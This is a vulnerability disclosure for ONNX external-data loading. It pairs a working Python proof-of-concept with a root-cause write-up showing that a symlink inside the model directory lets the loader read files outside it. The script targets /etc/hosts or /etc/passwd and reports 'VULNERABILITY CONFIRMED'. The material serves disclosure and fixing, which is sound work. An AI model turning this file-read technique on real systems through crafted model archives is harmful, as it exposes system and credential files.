#!/usr/bin/env python3
"""
ONNX External Data Symlink Traversal PoC
Finding: load_external_data_for_model() (via c_checker._resolve_external_data_location)
does not reject symlinks. A relative location that is a symlink inside the
model directory can target a file outside the directory and will be read.
Impact: Arbitrary file read outside model_dir when external data files are
obtained from attacker-controlled archives (zip/tar) that create symlinks.
This PoC:
- Creates a model with a tensor using external_data location 'tensor.bin'
- Creates 'tensor.bin' as a symlink to a system file (e.g., /etc/hosts)
- Calls load_external_data_for_model(model, base_dir)
- Confirms that tensor.raw_data contains the content of the outside file
Safe: only reads a benign system file if present.
"""
import os
import sys
import tempfile
import pathlib
# Make sure the `import onnx` that follows resolves to the installed package
# rather than a local clone sitting next to this script. Every sys.path entry
# that resolves to the script's directory is dropped -- including '' (the
# current directory), relative spellings and duplicates -- because a literal
# string comparison would leave such equivalent entries in place.
_here = os.path.dirname(os.path.abspath(__file__))
sys.path[:] = [
    entry
    for entry in sys.path
    # Non-string entries are left untouched; abspath('') yields the cwd.
    if not isinstance(entry, str) or os.path.abspath(entry) != _here
]
import onnx
from onnx import helper, TensorProto
from onnx.external_data_helper import (
set_external_data,
load_external_data_for_model,
)
def pick_target_file() -> str:
    """Return the path of a benign system file to use as the symlink target.

    The candidates are tried in order and the first one that is a regular
    file readable by the current user is returned.

    Raises:
        RuntimeError: If none of the candidate files is usable.
    """
    candidates = (
        "/etc/hosts",
        "/etc/passwd",
        "/System/Library/CoreServices/SystemVersion.plist",
    )
    for path in candidates:
        # isfile() already implies existence; os.access() backs up the
        # "readable" promise made by the error message below, so a caller
        # that opens the returned path does not hit a permission error.
        if os.path.isfile(path) and os.access(path, os.R_OK):
            return path
    raise RuntimeError("No suitable readable system file found for this PoC")
def build_model_with_external(location: str):
    """Build a minimal ONNX model whose only tensor is marked as external data.

    Args:
        location: Value recorded as the external-data location of the
            tensor named "X_ext".

    Returns:
        The model produced by ``helper.make_model``: a graph "g" with a
        single Constant node whose ``value`` attribute is that tensor.
    """
    # Empty 1-D UINT8 tensor; its content is meant to come from the external
    # file once the external data is loaded.
    ext_tensor = helper.make_tensor(
        name="X_ext", data_type=TensorProto.UINT8, dims=[0], vals=[]
    )

    # Placeholder bytes are assigned before the tensor is flagged as external.
    ext_tensor.raw_data = b"dummy"
    set_external_data(ext_tensor, location=location)

    # Smallest possible graph: one Constant node carrying the tensor, whose
    # output "out" is also the graph output.
    output_info = helper.make_tensor_value_info("out", TensorProto.UINT8, None)
    constant = helper.make_node(
        "Constant", inputs=[], outputs=["out"], value=ext_tensor
    )
    graph = helper.make_graph([constant], "g", inputs=[], outputs=[output_info])
    return helper.make_model(graph)
def _find_raw_data(model, tensor_name):
    """Return the raw_data of the tensor named *tensor_name*, or None.

    Graph initializers are searched first; if nothing is found there, the
    tensor-valued attributes of the graph's nodes are searched.
    """
    for tensor in model.graph.initializer:
        if tensor.name == tensor_name and tensor.HasField("raw_data"):
            return tensor.raw_data
    for node in model.graph.node:
        for attr in node.attribute:
            if (
                attr.HasField("t")
                and attr.t.name == tensor_name
                and attr.t.HasField("raw_data")
            ):
                return attr.t.raw_data
    return None


def main():
    """Run the PoC and return a process exit code.

    Returns:
        0 if the loaded tensor data starts with the target file's content,
        1 if the symlink cannot be created or loading raises,
        2 if the result is inconclusive (no raw_data found, or the target
        file is empty so there is nothing to compare against),
        3 if the loaded data does not match the target file.

    Raises:
        RuntimeError: Propagated from pick_target_file() when no candidate
            target file is available.
    """
    target = pick_target_file()
    print(f"[*] Using target file: {target}")

    # TemporaryDirectory removes the scratch directory (and the symlink in
    # it, never the symlink's target) on every exit path, so repeated runs
    # do not leave onnx_symlink_poc_* directories behind.
    with tempfile.TemporaryDirectory(prefix="onnx_symlink_poc_") as model_dir:
        link_name = os.path.join(model_dir, "tensor.bin")

        # Create symlink in model_dir pointing outside
        try:
            pathlib.Path(link_name).symlink_to(target)
        except OSError as e:
            print(f"[!] Failed to create symlink: {e}")
            print(" This PoC needs symlink capability.")
            return 1

        # Build model referencing the relative location 'tensor.bin'
        model = build_model_with_external(location="tensor.bin")

        # Use the in-memory model; explicitly load external data from model_dir
        print("[*] Loading external data into in-memory model...")
        try:
            load_external_data_for_model(model, base_dir=model_dir)
        except Exception as e:  # any loader failure ends the PoC with code 1
            print(f"[!] load_external_data_for_model raised: {e}")
            return 1

        raw = _find_raw_data(model, "X_ext")
        if raw is None:
            print("[?] Did not find raw_data on tensor; PoC inconclusive")
            return 2

        # Validate that raw_data came from the outside file by checking a prefix
        with open(target, "rb") as f:
            target_prefix = f.read(32)

        # startswith(b"") is always true, so an empty target proves nothing.
        if not target_prefix:
            print("[?] Target file is empty; nothing to compare, PoC inconclusive")
            return 2

        if raw.startswith(target_prefix):
            print("[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir")
            print(f" Symlink {link_name} -> {target}")
            return 0

        print("[?] Raw data did not match target prefix; environment-specific behavior")
        return 3
if __name__ == "__main__":
    # The value returned by main() becomes the process exit status.
    raise SystemExit(main())
Summary
`onnx/onnx/checker.cc`: `resolve_external_data_location`, used via Python `onnx.external_data_helper.load_external_data_for_model`.

Root Cause
`resolve_external_data_location(base_dir, location, tensor_name)` intends to ensure that external data files reside within `base_dir`. It:
- checks the location for `..`
- builds `data_path = base_dir / relative_path`
- checks `exists(data_path)` and `is_regular_file(data_path)`

`std::filesystem::is_regular_file(path)` follows symlinks to their targets. A symlink placed inside `base_dir` that points to a file outside `base_dir` will pass the checks and be returned. The Python loader then opens the path and reads the target file.

Code Reference
- `auto relative_path = file_path.lexically_normal().make_preferred();`
- `std::filesystem::exists(data_path)`
- `std::filesystem::is_regular_file(data_path)`
- `external_data_helper.load_external_data_for_tensor`

Proof of Concept (PoC)
`onnx_external_data_symlink_traversal_poc.py`: creates a model with a tensor whose external data location is `tensor.bin`. In the model directory, creates `tensor.bin` as a symlink to `/etc/hosts` (or similar). Calls `load_external_data_for_model(model, base_dir)`. Confirms that `tensor.raw_data` contains content from the target outside the model directory.

Run: `python3 onnx_external_data_symlink_traversal_poc.py`

Expected output: `[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir`

Attachment: `onnx_external_data_symlink_traversal_poc.py`
References